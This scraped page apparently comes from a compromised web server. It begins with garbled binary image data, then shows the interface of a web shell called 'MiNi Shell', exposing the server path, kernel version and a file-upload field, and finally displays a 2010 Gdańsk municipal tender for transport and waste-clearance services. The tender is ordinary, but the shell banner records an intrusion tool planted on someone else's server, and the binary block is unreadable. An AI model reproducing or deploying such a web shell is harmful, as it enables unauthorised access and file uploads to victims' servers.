JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100122/15045-N-2010.html

<p class="kh_header"><b>Gdańsk: Wykonywanie usług transportowych oraz opróżniania lokali z nieczystości dla potrzeb Zamawiającego w roku 2010</b><br>
<b>Numer ogłoszenia: 15045 - 2010; data zamieszczenia: 22.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gdański Zarząd Nieruchomości Komunalnych - Zakład Budżetowy , ul. Partyzantów 74, 80-254 Gdańsk, woj. pomorskie, tel. 58 3201032, 3200220, 3023282, faks 058 3458235.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gznk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie usług transportowych oraz opróżniania lokali z nieczystości dla potrzeb Zamawiającego w roku 2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje świadczenie usług transportowych w zakresie:
a) Przeprowadzek lokatorów przy użyciu samochodu z plandeką o ładowności od 3,5 do 4 ton z pracą 4 ładowaczy. 
Ilość godzin przewidziana dla danej usługi: 263.
Dysponentem pojazdów i ładowaczy w w/w zakresie będzie kierownik Działu Eksploatacji  lub osoby przez niego upoważnione.
b) Opróżniania opuszczonych lokali użytkowych, lokali mieszkalnych (po zmarłych lokatorach, osobach umieszczanych w domach opieki społecznej, zbieraczach odpadów), piwnic, komórek gospodarczych oraz wywozu pozostałości po pogorzeliskach, lokalach mieszkalnych po pożarze, zalaniu itp. i innych nieczystości nietypowych przy użyciu samochodu o ładowności od 3,5 do 4 ton wraz z pracą 4 ładowaczy. 
Ilość godzin przewidziana dla danej usługi: 500. 
Maksymalna przewidywana ilość odpadów do wywiezienia na miejskie wysypisko (zgodnie z  ustawą z dnia 27 kwietnia 2001 o odpadach (Dz. U. z 2001 r. Nr 62 poz. 628 z późn. zm.): 425 ton.
Dysponentem pojazdów i ładowaczy w w/w zakresie będzie kierownik Działu Eksploatacji lub osoby przez niego upoważnione.
c) Załadunku, wyładunku i transportu mebli i sprzętu stanowiącego mienie GZNK ZB pomiędzy jednostkami organizacyjnymi, w tym przewóz rzeczy należących do Zamawiającego (przeprowadzki między jednostkami terenowymi GZNK Z.B. przeprowadzki z lub do jednostek terenowych GZNK Z.B do lub z innych obiektów itp.) przy użyciu samochodu o ładowności od 3,5 do 4 ton oraz pracy 4 ładowaczy. 
Ilość godzin przewidziana dla danej usługi: 368.
Dysponentem pojazdów i ładowaczy w w/w zakresie będzie kierownik Działu Administracji lub osoby przez niego upoważnione.
d) Załadunek i przewiezienie ruchomości osób eksmitowanych do wskazanego lokalu socjalnego (pomieszczenia tymczasowego), względnie do magazynu (w przypadku lokali użytkowych, garaży, komórek, itp.). 
 Eksmisje będą przeprowadzone przy użyciu zespołu składającego się z samochodu o ładowności od 3,5 do 4 ton wraz z pracą 4 ładowaczy. W uzasadnionych przypadkach przy  użyciu 2 zespołów. Wykonawca musi 	zapewnić worki foliowe na rzeczy osobiste eksmitowanych, kartony papierowe na ruchomości szklane itp. taśmę do zaklejania worków i   mebli eksmitowanych, narzędzia do rozmontowywania mebli (kombinerki, śrubokręt, młotek itp.). Odpady i porzucone rzeczy Wykonawca będzie zobowiązany wywieźć na miejskie wysypisko. 
Ilość godzin przewidziana dla danej usługi - 127.
Dysponentem pojazdów i ładowaczy w w/w zakresie będzie kierownik Działu Windykacji lub  osoby przez niego upoważnione.
e) Przewozu w wyznaczonym przez Zamawiającego terminie 1 szt. szaletu sezonowego z bazy usytuowanej przy ul. Mściwoja II 44 w Gdańsku do miejsca wskazanego przez Zamawiającego oraz ustawienia w/w szaletu w miejscu wskazanym przez Zamawiającego,
f) Zwiezienia w wyznaczonym przez Zamawiającego terminie w/w szaletu do miejsca jego składowania.

Szczegółowy opis przedmiotu zamówienia i obowiązki wykonawcy, wynikające z realizacji  umów na poszczególne zadania, określone zostały we wzorach umów  stanowiących załączniki do siwz, w § 1, 2 i 4..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.18.10.00-3, 90.50.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 4 000,00 ZŁ, W TYM:
zadanie 1 - 2 100,00 zł; zadanie 2 - 1 900,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania:
- posiadają wiedzę i doświadczenie;
- dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia lub udowodnią, iż będą dysponowali zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia;
- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
- nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
- wskażą części zamówienia, których wykonanie wykonawca zamierza powierzyć podwykonawcom.

Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na zasadzie  - spełnia/nie spełnia.

W celu wykazania, że wykonawca spełnia warunki, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, zamawiający żąda, aby Wykonawca załączył do oferty następujące dokumenty:
- Wiedza i doświadczenie zawodowe - wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie.
Wykaz musi zawierać minimum 1 usługę transportową  popartą dokumentem potwierdzającym, że usługa ta została wykonana lub jest wykonywana należycie.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek musi spełniać co najmniej jeden wykonawca.
- Potencjał kadrowy - wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, oraz informacją o podstawie do dysponowania tymi osobami.
Wymagane jest wykazanie:
W przypadku składania oferty na zadanie 1:
 - 8 osób na stanowisku ładowacza; 
 - 2 osób na stanowisku kierowcy; 
 - 1 osoby na stanowisku kierowniczym. 
W przypadku składania oferty na zadanie 2:
 - 4 osób na stanowisku ładowacza; 
 - 1 osoby na stanowisku kierowcy; 
 - 1 osoby na stanowisku kierowniczym.		
W przypadku składania oferty na zadanie 1 i 2:
 - 12 osób na stanowisku ładowacza; 
 - 3 osób na stanowisku kierowcy; 
 - 1 osoby na stanowisku kierowniczym. 
 Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
- Potencjał techniczny - wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług, w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami.

Wymagane jest dysponowanie:
W przypadku składania oferty na zadanie 1:
 - co najmniej: 2 samochodami o ładowności od 3,5 do 4 ton wyposażonymi w plandekę oraz w pasy mocujące do przewozu mebli.
W przypadku składania oferty na zadanie 2: 
 - co najmniej 1 samochodem o ładowności od 3,5 do 4 ton.
W przypadku składania oferty na zadanie 1 i 2:
 - co najmniej: 3 samochodami o ładowności od 3,5 do 4 ton, w tym 2 wyposażonymi w plandekę oraz w pasy mocujące do przewozu mebli.
Wykonawca może polegać na potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował potencjałem technicznym niezbędnym do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnego potencjału technicznego na okres korzystania z nich przy wykonaniu zamówienia.
Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie.

Wykonawca ubiegający się o zamówienie publiczne zobowiązany jest:
- Złożyć Druk OFERTA, który należy sporządzić wg wzoru druku zamawiającego.
- Wskazać w złożonej ofercie części zamówienia, których wykonanie powierzy podwykonawcom. W przypadku nie wskazania części zamówienia, które mają być realizowane przez podwykonawców, zamawiający uzna, że całość zamówienia będzie wykonywana przez Wykonawcę osobiście.
- Złożyć kopię dowodu wpłaty wadium wpłaconego w pieniądzu lub oryginału albo kopię wadium wniesionego w jednej z form określonych w punkcie 10 SIWZ.
- Złożyć Formularz cenowy, który należy sporządzić wg wzoru druku Zamawiającego, odpowiednio na zadanie 1 i/lub 2.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego w okolicznościach, których mowa w art. 24 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, zamawiający żąda, aby Wykonawca załączył do oferty następujące dokumenty:
- oświadczenia o braku podstaw do wykluczenia Wykonawcy określonych w art. 22 ust 1  ustawy Prawo zamówień publicznych - treść oświadczenia znajduje się druku oferty, który stanowi załącznik nr 1 do SIWZ.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia wymagany dokument musi być złożony przez każdego wykonawcę.
W przypadku, kiedy wykonawca polega na zasobach innych podmiotów, a podmioty te będą brały udział w realizacji części zamówienia, wymagany dokument muszą złożyć także te podmioty.
- aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 ustawy, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert)
Pod pojęciem - aktualny - Zamawiający rozumie, że zapisy w dokumencie na dzień składania ofert, dotyczące nazwy podmiotu, siedziby, zakresu działalności, osób uprawnionych do reprezentacji podmiotu, miejsca działania są ważne i odpowiadające stanowi faktycznemu.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany dokument musi być złożony przez  każdego wykonawcę.
W przypadku, kiedy wykonawca polega na zasobach innych podmiotów, a podmioty te będą brały udział w realizacji części zamówienia, wymagany dokument muszą złożyć także te podmioty.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 2 - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument, o których mowa wyżej powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentu, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę. odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Oświadczenie powinno być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W celu wykazania, że wykonawca spełnia warunki, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, zamawiający żąda, aby Wykonawca załączył do oferty następujące dokumenty:
1) zezwolenie w formie decyzji na prowadzenie działalności w zakresie zbierania odpadów (art. 28 ust. 3 pkt 1 w zw. z art. 28 ust. 1 ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz.U. z   2001 r. Nr 62 poz. 628 z późn. zm.), wydane przez Prezydenta Miasta Gdańska, aktualne na dzień składania oferty lub promesę wydania zezwolenia.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia,  wymagane zezwolenie musi  być złożone przez co najmniej jednego wykonawcę,
lub 
zezwolenie w formie decyzji na prowadzenie działalności w zakresie odbierania odpadów  komunalnych od  właścicieli nieruchomości (art. 7 ust 1.pkt 1 ustawy z dnia 13 września  1996 r. o utrzymaniu czystości i  porządku w gminach (tekst jednolity Dz.U. z 2005 r. Nr 236  poz. 2008 z późn. zm.), wydane przez Prezydenta Miasta Gdańska, aktualne na dzień składania oferty lub promesę wydania zezwolenia. 
W przypadku składania oferty  przez wykonawców ubiegających się wspólnie o udzielenie   zamówienia, wymagane zezwolenie musi  być złożone przez co najmniej jednego wykonawcę.
2)  zezwolenie w formie decyzji na prowadzenie działalności w zakresie transportu odpadów (art. 28 ust. 3 pkt 2 w zw. z art. 28 ust. 1 ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz.U. z 2001 r. Nr 62 poz. 628 z późn. zm.), wydane przez starostę właściwego ze względu na  miejsce siedziby lub zamieszkania Wykonawcy, aktualne na dzień składania oferty lub promesę  wydania zezwolenia.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane zezwolenie musi być złożone przez co najmniej jednego wykonawcę.
W decyzjach określonych w/w ppkt 1 i 2 muszą być ujęte co najmniej rodzaje odpadów o następujących kodach:
 - 200201 - odpady ulegające biodegradacji,
 - 200301 - niesegregowane (zmieszane) odpady komunalne,
 - 200303 - odpady z czyszczenia ulic i placów,
 - 200307 - odpady wielkogabarytowe,
- 200399 - odpady komunalne nie wymienione w innych podgrupach.
Jeżeli podczas realizacji zamówienia zajdzie konieczność usunięcia innych niż przewidywane rodzaje odpadów (np. nietypowych odpadów niebezpiecznych, ropopochodnych, zawierających PCB itp.). Wykonawca ma obowiązek zgodnie z § 4 ust. 4 umowy zlecić na własny koszt usunięcie tych odpadów podwykonawcy, posiadającemu stosowne uprawnienia w tym zakresie.
Pkt. 1) i 2) dotyczą przypadku skladania oferty na zadanie 2.
- Oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia (dotyczy uprawnień dla kierowców pojazdów o ładowności powyżej 3,5 tony -  wymagania  określone w art. 39 a  ustawy z dnia 6  września 2001 r. o transporcie  drogowym (tekst  jednolity - Dz.U. z 2004 r. nr  204. poz. 2088 z póź. zm.).
- Opłaconej polisy a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości co najmniej:
            -   w przypadku składania oferty na zadanie 1 -   60 000 zł,
            -   w przypadku składania oferty na zadanie 2 -   40 000 zł,
	 -   100 000 zł w przypadku składania oferty jednocześnie na zadanie 1 i 2.
Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany dokument musi być złożony przez co najmniej jednego wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gznk.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 80-171 Gdańsk ul Cygańska Góra 1, pokój nr 16, w godz. 8:00 - 12:00. Cena brutto - 12,20 PLN.
Warunki i sposób płatności: gotówka, zaliczenie pocztowe, przelew.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.02.2010 godzina 10:30, miejsce: 80-171 Gdańsk ul Cygańska Góra 1, sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 02.03.2010.</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> WARUNKI ZMIAN POSTANOWIEŃ UMOWY.
Następujące postanowienia umowy mogą ulec zmianie:
1. Zamawiający dopuszcza  zmiany stawki podatku od towaru i usług;
Zmiany w umowie mogą zostać wprowadzone przy zaistnieniu następujących okoliczności:
1. W przypadku zmiany obowiązujących przepisów prawnych określonych w ustawie z dnia 11.03.2004 r. o podatku od towarów i usług.

DATA, GODZINA I MIEJSCE OTWARCIA OFERT:
01.02.2010 r. godzina 10:45 miejsce 80-171 Gdańsk ul Cygańska Góra 1, świetlica.

OSOBY UPRAWNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI 
Marek Skuhra, Gdańsk ul. Cygańska Góra 1,  nr pok. 16, tel. 58/ 302-32-82,  nz@gznk.pl.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonywanie usług transportowych dla potrzeb Zamawiającego w roku 2010.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje świadczenie usług transportowych w zakresie:
1. Przeprowadzek lokatorów przy użyciu samochodu z plandeką o ładowności od 3,5 do 4 ton z pracą 4 ładowaczy. 
2. Załadunku, wyładunku i transportu mebli i sprzętu stanowiącego mienie GZNK ZB pomiędzy jednostkami organizacyjnymi, w tym przewóz rzeczy należących do Zamawiającego (przeprowadzki między jednostkami terenowymi GZNK Z.B. przeprowadzki z lub do jednostek terenowych GZNK Z.B do lub z innych obiektów itp.) przy użyciu samochodu o ładowności od 3,5 do 4 ton oraz pracy 4 ładowaczy.  	
3. Załadunku i przewiezienia ruchomości osób eksmitowanych do wskazanego lokalu socjalnego (pomieszczenia tymczasowego), względnie do magazynu (w przypadku lokali użytkowych, garaży, komórek, itp.). 
Eksmisje będą przeprowadzone przy użyciu zespołu składającego się z samochodu o ładowności od 3,5 do 4 ton 	wraz z pracą 4 ładowaczy. W uzasadnionych przypadkach przy użyciu 2 zespołów. Wykonawca musi zapewnić worki foliowe na rzeczy osobiste eksmitowanych, kartony papierowe na ruchomości szklane itp. taśmę do zaklejania worków i mebli eksmitowanych, narzędzia do rozmontowywania mebli (kombinerki, 	śrubokręt, młotek itp.). Odpady i porzucone rzeczy Wykonawca będzie zobowiązany wywieźć na miejskie wysypisko. 
4. Przewozu w wyznaczonym przez Zamawiającego terminie  szt. szaletu sezonowego z bazy usytuowanej przy ul.  Mściwoja II 44 w Gdańsku do miejsca wskazanego przez Zamawiającego oraz ustawienie w/w szaletu w miejscu wskazanym przez Zamawiającego.
5. Zwiezienia w wyznaczonym przez Zamawiającego terminie w/w szaletu do miejsca jego składowania.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.18.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonywanie usług opróżniania lokali z nieczystości dla potrzeb Zamawiającego w roku 2010.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje świadczenie usług transportowych przy użyciu samochodu o ładowności od 3,5 do 4 ton wraz z pracą 4 ładowaczy w zakresie wywozu nieczystości polegającym na:
1. opróżnianiu opuszczonych lokali użytkowych z nieczystości,
2. opróżnianiu lokali mieszkalnych (po zmarłych lokatorach, osobach umieszczanych w domach opieki społecznej, zbieraczach odpadów)z nieczystości,
3. opróżnianiu piwnic, komórek gospodarczych z nieczystości;  
oraz; 
4. wywozu pozostałości po pogorzeliskach, 
5. wywozu pozostałości w lokalach mieszkalnych po pożarze, zalaniu itp. 
6. wywozu innych nieczystości nietypowych.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 90.50.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com